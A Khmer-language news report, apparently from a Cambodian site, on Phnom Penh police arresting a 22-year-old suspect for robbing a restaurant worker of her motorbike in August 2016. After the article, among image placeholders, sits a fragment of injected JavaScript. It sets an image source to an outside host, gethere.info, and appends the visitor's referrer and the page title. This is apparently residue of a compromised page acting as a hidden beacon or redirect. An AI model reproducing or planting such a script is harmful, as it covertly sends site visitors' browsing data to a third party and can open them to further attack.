វាយប្លន់យកម៉ូតូពីបុគ្គលិកភោជនីដ្ឋាន (ព្រីន) មិនបានមួយថ្ងៃផង ត្រូវនគរបាលខណ្ឌឬស្សីក្របួចជាប់


ភ្នំពេញ៖សមត្ថកិច្ចនគរបាលខណ្ឌឬស្សីកែវ ដឹកនាំដោយ លោកវរសេនីយ៍ ទៀង ច័ន្ទសារបានធ្វើការឃាត់ ខ្លួនជនសង្ស័យម្នាក់ករណីវាយប្លន់យកម៉ូតូពីបុគ្គលិកភោជនីដ្ឋាន (ព្រីន) ម៉ោង១៦និង ៣១នាទីថ្ងៃទី១ ខែសីហា ឆ្នាំ២០១៦ នៅចំណុចក្រុមទី១៦ ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ ជនសង្ស័យមានឈ្មោះ គៀត សុវណ្ណារ៉ា ភេទប្រុស អាយុ២២ឆ្នាំ ខ្មែរ ទីលំនៅសង្កាត់ទួលសង្កែ មុខរបរ:មិនប្រាក។
គួររំលឹកដែរថា ករណីវាយប្លន់យកម៉ូតូខាងលើកើតឡើងនៅយប់ថ្ងៃទី០១ខែសីហា ២០១៦ វេលាម៉ោង ០៣ និង៣០នាទី កណ្ដាលអាធ្រាត្រ នៅចំណុចមុខផ្ទះលេខផ្កូវលេខ៩៣ ក្រុមទី១៨ ភូមិទួលគោក សង្កាត់ទួលសង្កែ ហើយនៅវេលាម៉ោង១៥និងង០០នាទីថ្ងៃខែឆ្នាំដដែល ទើបជនរងគ្រោះ ឈ្មោះ ឡេវ ស្រី លី ភេទស្រី អាយុ២១ឆ្នាំ ខ្មែរ ទីលំនៅសង្កាត់ប្ញស្សីកែវមុខរបរ: បុគ្គលិកភោជនីដ្ឋាន(ព្រីន)បានមក ដាក់ ពាក្យបណ្ដឹងទើបកម្លាំងជំនាញអធិការដ្ឋាន និងប៉ុស្តិ៍បើកការស្រាវជ្រាវកំណត់ អត្តសញ្ញាណមុខសញ្ញា ជនសង្ស័យតែម្តង។ នៅចំពោះមុខសមត្ថកិច្ចជនសង្ស័យបានសារភាពខ្លួន ពិតជាបានធ្វើ សកម្មភាព០១ នាក់ឯងវាយយកម៉ូតូម៉ាកHONDA(ស្កុបពី)ពាក់ស្លាកលេខភ្នំពេញ1AQ-7969ពីជនរងគ្រោះប្រាកដ មែន:ហើយយកទៅបញ្ចាំនៅម្ដុំឃ្លាំងរំសេវបានប្រាក់ចំនួន២៥០$ចាយវាយផឹកស៊ីអស់។
បច្ចុប្បន្នអធិការដ្ឋានខណ្ឌឬស្សីកែវបាននិងកំពុងកសាងសំណុំរឿងបញ្ជូនជនសង្ស័យឈ្មោះ គៀត សុវណ្ណារ៉ា ទៅសាលាដំបូងរាជធានីភ្នំពេញអនុវត្តន៍តាមនីតិវិធីច្បាប់។

image

image  images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More